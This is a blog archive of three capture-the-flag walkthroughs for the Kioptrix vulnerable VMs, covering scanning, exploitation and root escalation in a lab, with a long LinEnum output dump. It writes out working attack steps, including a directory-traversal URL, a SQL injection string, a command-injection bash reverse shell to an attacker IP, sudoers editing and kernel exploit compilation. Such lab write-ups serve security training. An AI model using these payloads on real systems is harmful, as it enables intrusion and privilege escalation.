Tag Archives: kioptrix

OSCP like Vulnhub machines: Kioptrix: 2014

Download VM

Kioptrix 2014 is an Intermediate level Boot2Root VM, released under the Kioptrix series of VMs. Kioptrix 2014 was an incredible machine for me since it forced me to get out of my usual routines and go an extra mile for gaining the initial foothold, but the privesc was fairly straightforward.

Let’s start the enumeration process with netdiscover.

netdiscover -Lr 192.168.1.0/24

Where 192.168.1.0/24 is my home network’s range, -L is to keep listening and -r is to specify range.

From that command i’ve found out the IP Address of the target as 192.168.1.4.

we are going to start the enumeration by a Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.4

And the output is as follows.

Nmap scan report for 192.168.1.4
Host is up (0.00018s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods: 
|_  Supported Methods: GET
|_http-title: 403 Forbidden
MAC Address: AA:22:CC:44:DD:66 (VMware)

There was two Apache web servers running at ports 80 and 8080 and an SSH service running. The Apache service was leaking the OS variant as FreeBSD. Given the distro and the Apache version information I’ve found a possible OS version as FreeBSD version 9.0 with a little googling.

Port 80 showed a default It Works Apache page.

Let’s check the web site running on port 8080.

Oops

The web site running at port 8080 was forbidden to us for some reason. This occurs usually because the apache2.conf file is configured to do so. A sample configuration is listed below.

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from 192.168.1.2
</Directory>

In the above sample apache2.conf entry, the server will only allow requests with the IP address 192.168.1.2 and discards every request from IP addresses other than this. Let’s keep this information in the back of our head for now.

Moving on..

I’ve bruteforced both the web sites without any interesting results. Since we do not have an initial foothold yet even after bruteforcing, I decided to look at the source code of the web site running on port 80.

And there was a clue for a pchart web service in the source code.

Navigating to the said URL showed me the following page.

I digged around the website and found nothing interesting. But, Searchsploit-ing the pChart version has found fruitful as there existed a directory traversal/ LFI vulnerability!

LFI vulnerability in EDB -ID 31173

As per exploit-db, the vulnerability can be exploited by requesting the following URL.

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Since our server has pchart in a different folder, I changed the URL to the following.

http://192.168.1.4/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
And we’ve got the contents of /etc/passwd in the server!

We are off to a great start! Or so I thought.

Laugh To Cry GIFs - Get the best GIF on GIPHY

My initial plan was to try to get a remote shell using log poisoning. But FreeBSD is does not follow the same linux standards and things are different in several aspects including the location of the log file.

I looked up the location of apache access logs and found the location as /var/log/httpd-access.log and I successfully used the above discovered vulnerability to view the contents of the file.

But, no matter what I tried, I couldn’t find a way to execute code through log poisoning. My poison code was showing up on the logs, but there was some pre processing taking place, before the data gets entered in the log file. So, there is no way to execute my poisoning code, without bypassing the filter.

I’ve tried several iterations of the PHP poison code, but none of them worked. All the quote characters were escaped by the pre-processing script. So, I have decided to move on.

Moving on..

I was stuck at this time. I had no idea how to proceed from here, except continuing the bruteforcing and digging around the server using the LFI vulnerability. So, I decided to do so.

We only had three services running in the target. SSH on port 22 and two web servers on port 80 and 8080; where port 8080 was inaccessible for us. Like we discussed above, this was configured using the apache.conf file.

But, since we are dealing with FreeBSD, the file name and location varied. I looked up the configuration file location and found it as /usr/local/etc/apache22/httpd.conf.

Examining the apache configuration file was fruitful as it showed the following (weird) configuration.

Only requests with a specific UA was given access to server 8080

So, I installed a FireFox addon called User-Agent Switcher by Alexander Schlarb, added a custom User agent string and navigated to the web server running at port 8080.

And I’ve found a directory
A web service named phptax was running there

Searchsploit-ing the name phptax showed me the following results.

There was some vulnerabiliites for Phptax v0.8

I decided to try the manual exploits before going into using Metasploit exploits. I knew it was harder, but where is the learning experience in exploiting the easy way?

I was able to exploit the phptax using both manual way and the msf way. Let’s discuss how I exploited the machine using both ways.

Method#1 Exploitation using Manual Exploit.

I knew that I needed to modify the exploit to accommodate the special condition (the weird UA string) for the exploit to work. And with some struggling I’ve modified a rce script I’ve found on carnal0wngae’s github repo to work with Kioptrix 2014. Actually I made two scripts: a python2 one and a python3 one.

Along with the UA string, I also swapped the payload in the original script to accommodate two separate payloads in my script; as the original bind shell payload wasn’t working for me. This can be selected by passing the command line argument 1 or 2 into the script.

The first payload in my version of the phptax_rce script uses the netcat without -e reverse shell method and the second payload uses telnet to spawn a reverse shell. The second payload (Telnet) used in my version of the script is a modified version of the payload used by the Phptax MSF module.

You can find the modified scripts from my github repo.

Running the modified version of the phptax_rce script
And we got the reverse shell!
Tobey Maguire GIFs - Get the best GIF on GIPHY

Keep in mind that, when using a nc listener, I had to use the -k flag with nc, because if I didn’t specify the -k flag, then sometimes the shell would die upon receiving the connection back. This mostly happened when I used the telnet payload. So, it would be better to stick with the nc without -e payload.

Method#2 Exploitation using MSF module.

Exploitation using phptax_exec MSF module was fairly straight forward for me, except the fact that we have to modify the UA string. As far as I know, there wasn’t a built-in option inside MSF to swap the User Agent string without fiddling with the module’s script. To keep things simple, I decided to alter the User Agent on the fly using Burp suite.

So, I set the PROXIES option to redirect the traffic to Burp Suite and set the ReverseAllowProxy option as true. We are setting ReverseAllowProxy as true because, by default MSF doesn’t allow TCP-Connect back payloads when specifying proxies. So, by setting ReverseAllowProxy option as true, we are overriding this behavior.

Available options in phptax_exec module

Along with the usual options, we had to specify a payload before running this module; which by the way was not specified anywhere in the module. If we run the module without specifying a payload, there will be an error.

Also, the payload should be selected by typing set payload and pressing the <tab> button, to let the autocomplete function list the available payloads. We are using the tab auto complete feature instead of explicitly specifying a payload here, because this module only supports a handful of payloads and we want to see the list of available payloads.

Selecting a payload in phptax_exec module

As you can see from the above image, I selected the cmd/unix/reverse payload.

set payload cmd/unix/reverse

Now, when I executed the module with run -j, Burp suite captured the traffic and I chaned the User Agent string.

Changing the User Agent string via Burp Suite

And once I forwarded the request, I got a connection back!

Moving on to Privilege escalation…

Now, I knew the O.S version was an old one and chances are high that there is a kernel exploit for this version. But, I decided to try that later and explore the machine to find any vulnerabilities that I can exploit manually.

I tried different things in the machine. I ran linpeas script, manually went into different directories; you know, the usual stuff.

But I couldn’t find any manual vector to escalate the privileges. Linpeas output showed the presence of gcc in the machine, which pointed that this box was probably meant to be rooted using a kernel exploit. So, I searchsploit-ed FreeBsd 9.0 and found a kernel exploit for it. FreeBSD 9.0 < 9.1 – ‘mmap/ptrace’ Local Privilege Escalation- [EDB-ID 26368]

I transferred the 26368.c script using nc, compiled it with gcc and got root!

Woot!

There was a congratulaion.txt flag in the /root directory, which explained the tools and technologies used by the author; which was a nice touch! Kudos to loneferret for this machine and going this extra mile.

Loneferret also created a custom script to monitor and log the modified directories or files. He also installed “OSSEC-HIDS”; an IDS for monitoring the attacks and logging them. This will gave us an idea of how noisy the attacks are from a blue team perspective.

Overall this was a great VM to learn pentesting and it was indeed a great learning experience for me!

OSCP like Vulnhub machines: Kioptrix: Level 1.2 (#3)

Download VM

As always we are going to start the attack by identifying the device by using

netdiscover -Lr 192.168.1.0/24

Where 192.168.1.0/24 is my home network’s range, -L is to keep listening and -r is to specify range.

From that command i’ve found out the IP Address of the target as 192.168.1.4.

we are going to start the enumeration by a Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.4

And the output is as follows.

Nmap scan report for 192.168.1.4
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 AA:22:CC:44:DD:66:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 AA:22:CC:44:DD:66:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: AA:22:CC:44:DD:66 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that there are two running services in the target machine. Let’s checkout the website the target machine is running.

Further enumeration on the website showed a blog, which we can comment by including a URL.

Comment section on blog page

I tried to post a URL by starting the http.server python module to see if we get a request from the target. But it didn’t work.

Rabbit Hole GIFs | Tenor
Rabbit holes everywhere!

Moving on to the login page.

I have tried usual SQL injection techniques, to no success. But, I noticed the banner provided in the login page.

Searchsploit-ing the name has returned some results.

Potential vulnerabilities for the CMS

But, as we can see there is no mention of Lotus CMS’s version anywhere in the website. I have tried looking at the source code for any mention about the CMS version, but there wasn’t any. So, let’s try to find an approximate version of the Operating system to match it with the Lotus CMS version.

From a quick google search with the PHP banner, we can see that the package dates back to 2008-2009.

With this information in mind, let’s examine the searchsploit results one by one.

And we’ve found one.

The environment mentioned in the exploit matches with our target machine’s services. Let’s verify if the Lotus CMS version 3.0 (mentioned in the exploit) is released around the date of the package date we enumerated earlier.

LotusCMS on sourceforge

The Lotus CMS version 3.0 is uploaded around 2011. This information can’t be used to derive at a solid conclusion, but there is a high chance that the target machine is not running Lotus CMS version 3.0. However, since the target machine’s environment matches our exploit and this is a CTF challenge, it is safe to assume that this exploit will work.

I’ve tried running the above exploit (15964.py), however it failed miserably.

Crying Meme GIFs | Tenor

Moving on…

I’ve decided to google a bit to find if there is any GitHub repo with another (hopefully fixed) version of this same exploit. With a simple google search, I’ve found this GitHub repo with both bash version and ruby version of the Lotus CMS RCE exploit.

There was a little easter egg in this exploit, reassuring us that this is indeed the intended exploit.  😛 

I have executed the exploit using the following command.

ruby lotusRCE.rb -t 192.168.1.4 -p /
Running LotusCMS RCE exploit

And we got a shell back! So, the target was indeed running Lotus CMS 3.0. It was just an issue with the exploit code we used.

We are now www-user!

I tried to upgrade my shell from a dumb shell to a full TTY shell. But even after I did, for some reason I couldn’t use Tab auto completion and some errors were not showing up.

Anyways, I tried to dig around the www directory to find out any exposed passwords. But the directory structure was too weird and with the dumb shell I had, it was taking too much time.

Even grep didn’t gave any outputs. Didn’t know if my syntax was messed up or it was something with the dumb shell. So, I decided to use an enumeration script. This time I went with LinPeas.sh script instead of LinEnum.sh, since LinPeas is more extensive and it has pretty kawaii output. That turned out to be a pretty wise decision!

I have found out that there is a MySQL server running, listening to connections from the Localhost only.

LinPeas has also found out the password in the PHP config file (which I couldn’t) pretty easily .

Pretty rude password, but ok.

I have tried this password for logging into MySQL as the root user.

mysql -u root -p
> fuckeyou

And we’ve successfully logged in!

Digging around the databases was fruitful as we have found the password hashes for two users.

Results from the LinPeas scripts have suggested that these users are also local users in this machine.

So, it is only logical to crack these hashes and use it to login to their accounts.

Using hashid has showed me that the hash could be MD5. So, I’ve used md5online.org to crack the hash.

I then logged in to user loneferret's account via SSH with the cracked password.

Issuing the command sudo -l as loneferret has showed us the following output.

This means that we can run the program ht as super user, but we cannot run su.

Let’s try the ht command.

sudo ht

I couldn’t execute the binary since the terminal type I used wasn’t installed in the target. Let’s enumerate the available terminals in the target.

ls -R /usr/share/terminfo

Available terminals in target

The target has xterm terminal installed. Xterm is preinstalled in Kali Linux so, let’s open an xterm terminal and login to the target.

Opening Xterm
Logging in via SSH
Output of sudo ht command

As we can see ht command opened an editor program. A little bit of googling has showed us that the program is called HT Editor, which is used to edit binary files.

My first thought was to create an authorized_keys file in the root folder, but I couldn’t navigate through the application via Mouse due to an unknown error. Also, no key combinations was set in HT Editor to create a new file (most probably the program lacked this feature), forcing me to reject the idea of writing to root’s SSH folder.

I could however open folders and files that already existed. I could even view the contents of the root folder! (And obviously the flag Congratulations.txt; But that’s no fun is it?!)

I have tried viewing the hash of the root user via opening /etc/shadow and cracking it. But, with an hour of cracking attempt, I gave up.

I failed escalating privileges by myself, so I looked at other writeups on Kioptrix-3 and found out that we can actually edit the /etc/sudoers file to escalate privileges.

In the walkthrough, what they did was editing the /etc/sudoers file to add a new binary path (/bin/bash) to the sudoers file against the loneferret user.

This was new information for me!

However, my ego was too high to blindly follow the walkthorugh. I wanted to come up with something on my own.

My first idea was to change the

!/usr/binsu

to the following

/usr/bin/su

But unfortunately, it didn’t work. Ouch!

So, I followed the steps mentioned in the walkthorugh.

I pressed F3 to open a file, entered the absolute path of the sudoers file /etc/sudoers into the HT editor.

Added /bin/bash to the line corresponding to loneferret followed by a comma

saved it with F2 , exited the HT editor with F10 and issued sudo /bin/bash to the command line.

And we’re root!

Awkward GIF - Find & Share on GIPHY

Not my proudest moment, but hey we learned something new! So, it’s a win-win situation! 😅

Flag on Kioptrix 3

For me this was a greater learning experience than the previous Kioptrix boxes. Woot Woot!

OSCP like Vulnhub machines: Kioptrix: Level 1.1 (#2))

Kudos to abatchy’s blog for compiling this list.

Download VM

We are going to start identifying the device my using

netdiscover -Lr 192.168.1.0/24

Where 192.168.1.0/24 is my home network’s range, -L is to keep listening and -r is to specify range.

From that command i’ve found out the IP Address of the target as 192.168.1.10.

As usual, we are going to start the enumeration by a Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.10

And the output is as follows.

Nmap scan report for 192.168.1.10
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            627/udp   status
|_  100024  1            630/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2020-12-14T11:11:35+00:00; -2h09m37s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

We can see there is an HTTP website and an HTTPS website running in the target. Inspecting them on the browser has showed a webpage like the following.

Website running on Kioptrix

Since this is an easy machine, I pulled up one of the oldest but greatest hacking trick in a hacker’s sleeve. SQL Injection.

'OR 1=1--
Trying SQL Injection in Kioptrix’s login page

It worked like a charm! But it was unsurprising as this is intended to be an easy machine.

We were presented with a Web console after the successful SQL Injection

The web console was intended to ping any machine on the network and give us the results. Entering an IP address in the console presented us with a familiar output.

Output of ping

The output is exactly the same output as the ping tool in linux. So, it is safe to assume that the web page is working as a frontend and passing the IP parameter to the ping tool.

The PHP code to perform this will look like the following.

$IP= $_REQUEST[ 'ip' ];
 # Reading User's IP input from text box
shell_exec( 'ping -c 4 ' . $IP); # The unsanitized input is passed to shell_exec() function

So, if the frontend developer didn’t code securely (like the above code), then we can perform an OS Command injection.

To perform a OS command injection, we can use the (;) Semicolon character to terminate the ping command and inject our own command.

So, if we pass the value 

192.168.1.2;whoami

We will get the following output.

OS command injection succesful

We can see that the OS injection was successful, as the output of whoami command is also showing.

Now, we can use a bash reverse shell one liner from PayloadAllTheThings and our payload becomes the following.

192.168.1.2; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1

Here, 192.168.1.9 is our attacking Kali machine and 9001 is the listening address. 

rlwrap nc -lvnp 9001

I started a Netcat listener and passed the payload in the web console. Here rlwrap is used to make ‘dumb’ reverse shells a little more tolerable. Specifying rlwrap before nc listener will spawn a reverse shell that has capabilities like command history and moving between characters using arrow keys.

But, keep in mind that specifying rlwrap is NOT EQUAL TO or a viable replacement to spawning an actual TTY shell. This is used to make interactions with a dumb shell a little more comfortable.

And by passing the above payload to the web console, we got the reverse shell back from the target!

Got Reverse Shell!

Now that we have the initial foothold on the machine, let’s begin the local enumeration process.

On the /var/www/html directory, i have found the two files responsible for the Web console. Inspecting the files has given us credentials to the MySQL service running in the target machine.

Exposed MySQL db credentials in the index.php file

I’ve logged in to the MySQL service using these credentials, but I couldn’t see the output, since we are not in an actual TTY shell. That means we have to upgrade our dumb shell to a full TTY shell.

Let’s see if the machine have python or not using the command which python. Lucky for me python was already installed in the machine. Let’s upgrade the shell now using the following python one liner.

python -c 'import pty;pty.spawn("/bin/bash")'

And we’ve succesfully upgraded the shell to a full TTY shell. We can check if our current shell is TTY or not by issuing the tty command.

Upgrading to TTY shell

Now, let’s login to MySQL using the following command. The password will be prompted after entering this command.

mysql -u john -p

Enumerating the database didn’t provide us any fruitful results except the these credentials and the fact that john’s same password is used for logging into MySQL root account.

Contents of the users table

I have tried logging into SSH using these credentials to test for password reuse, but it was futile. Oh well!

Moving on…

Let’s enumerate the system for possible Privsec routes. I’ve used the trusty old. LinEnum.sh script for enumerating the machine. I started a python web server using python -m http.server 80 on my Kali machine and issued wget http://192.168.1.9/LinEnum.sh on the target machine to download the enumeration script on the target.

And while the script is running, let’s check the target’s distribution version, by issuing the following commands.

lsb_release -a
uname -a
Target is running CentOS 4.5 which dates back to 2007

So, it is an old (obsolete to be fair) version of CentOS and I am pretty sure that there are tons of Privilege escalation exploits for this version.

So, let’s find the possible exploits for this version. I am using the distribution name and kernel version (2.6) as the query.

searchsploit centos 2.6
Potential Kernel exploits for the target

The second to last result sounds promising since our kernel version is 2.6.55 and the exploit is for kernels ranging from 2.6.32 to 3.x. The exploit db id is 9542.

Let’s examine the exploit contents by using the following command.

searchsploit -x 9542
Contents of 9542.c

This exploit does look promising and the compilation is rudimentary.

Now, let’s copy the exploit to our present working directory using the following command.

searchsploit -m 9542

Now we can try exploiting this right away. But, since we are in this for learning purposes, let’s take things slow; as I want to see if there are additional privilege escalation vectors intended by the creator and of course manual exploitation is way more satisfying.

Using a Kernel vulnerability to escalate privileges always make me feel a little bit guilty.

The output of the LinEnum script is given at the end of this post as it is too long.

Unfortunately, I didn’t find any valid privesc routes. There was an ESMTP server running within the localhost and the CUPS service (which we found in the Nmap scan) which looked promising; but, exploitation attempts on both services failed. So, they must’ve been rabbit holes!

Moving On..

Let’s move on to the kernel exploit we found earlier. From the LinEnum.sh output, I have already seen that the target machine has gcc. So, the only remaining step is to move the exploit to the target machine and compile it.

Change the working directory to /tmp and download the exploit to the target. just like we did before. (Combo of http.server python module and wget).

Compile the exploit with gcc 9542.c -o exploit and run it with ./exploit.

And we are root!

The output of LinEnum.sh is given below:


[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Fri Dec 18 23:36:25 EST 2020
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007


[00;31m[-] Specific release information:[00m
CentOS release 4.5 (Final)


[00;31m[-] Hostname:[00m
kioptrix.level2


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=48(apache) gid=48(apache) groups=48(apache)


[00;31m[-] Who else is logged on:[00m
 23:36:25 up 12 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=1(bin) gid=1(bin) groups=1(bin),2(daemon),3(sys)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=9(news) gid=13(news) groups=13(news)
uid=10(uucp) gid=14(uucp) groups=14(uucp)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=13(gopher) gid=30(gopher) groups=30(gopher)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=69(vcsa) gid=69(vcsa) groups=69(vcsa)
uid=37(rpm) gid=37(rpm) groups=37(rpm)
uid=68(haldaemon) gid=68(haldaemon) groups=68(haldaemon)
uid=34(netdump) gid=34(netdump) groups=34(netdump)
uid=28(nscd) gid=28(nscd) groups=28(nscd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=47(mailnull) gid=47(mailnull) groups=47(mailnull)
uid=51(smmsp) gid=51(smmsp) groups=51(smmsp)
uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser)
uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
uid=77(pcap) gid=77(pcap) groups=77(pcap)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=23(squid) gid=23(squid) groups=23(squid)
uid=67(webalizer) gid=67(webalizer) groups=67(webalizer)
uid=43(xfs) gid=43(xfs) groups=43(xfs)
uid=38(ntp) gid=38(ntp) groups=38(ntp)
uid=66(pegasus) gid=65(pegasus) groups=65(pegasus)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=500(john) gid=500(john) groups=500(john)
uid=501(harold) gid=501(harold) groups=501(harold)


[00;31m[-] It looks like we have some admin users:[00m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Are permissions on /home directories lax:[00m
total 24K
drwxr-xr-x   4 root   root   4.0K Oct 12  2009 .
drwxr-xr-x  23 root   root   4.0K Dec 18 23:24 ..
drwx------   2 harold harold 4.0K Oct 12  2009 harold
drwx------   2 john   john   4.0K Oct  8  2009 john


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
CONSOLE=/dev/console
SELINUX_INIT=YES
TERM=linux
INIT_VERSION=sysvinit-2.85
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
runlevel=3
RUNLEVEL=3
PWD=/tmp
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N
SHLVL=5
HOME=/
_=/bin/env


[00;31m[-] SELinux seems to be present:[00m
SELinux status:		disabled


[00;31m[-] Path information:[00m
/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /bin
drwxr-xr-x  2 root root 12288 Oct  7  2009 /sbin
drwxr-xr-x  2 root root 36864 Oct  9  2009 /usr/bin
drwxr-xr-x  2 root root 12288 Oct  8  2009 /usr/sbin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /usr/X11R6/bin


[00;31m[-] Available shells:[00m
/bin/sh
/bin/bash
/sbin/nologin
/bin/ash
/bin/bsh
/bin/ksh
/usr/bin/ksh
/usr/bin/pdksh
/bin/tcsh
/bin/csh
/bin/zsh


[00;31m[-] Current umask value:[00m
u=rwx,g=rx,o=rx
0022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r--  1 root root    0 Oct  7  2009 /etc/cron.deny
-rw-r--r--  1 root root  255 Feb 21  2005 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x   2 root root  4096 Jul 12  2006 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.daily:
total 108
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
lrwxrwxrwx   1 root root    28 Oct  7  2009 00-logwatch -> ../log.d/scripts/logwatch.pl
-rwxr-xr-x   1 root root   418 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   135 Feb 21  2005 00webalizer
-rwxr-xr-x   1 root root   276 Feb 21  2005 0anacron
-rw-r--r--   1 root root   797 Feb 21  2005 certwatch
-rwxr-xr-x   1 root root   180 Oct 20  2006 logrotate
-rwxr-xr-x   1 root root  2133 Dec  1  2004 prelink
-rwxr-xr-x   1 root root   104 May  4  2007 rpm
-rwxr-xr-x   1 root root   121 Aug 21  2005 slocate.cron
-rwxr-xr-x   1 root root   286 Feb 21  2005 tmpwatch
-rwxr-xr-x   1 root root   158 May  5  2007 yum.cron

/etc/cron.hourly:
total 24
drwxr-xr-x   2 root root  4096 Feb 21  2005 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.monthly:
total 32
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rwxr-xr-x   1 root root   278 Feb 21  2005 0anacron

/etc/cron.weekly:
total 48
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
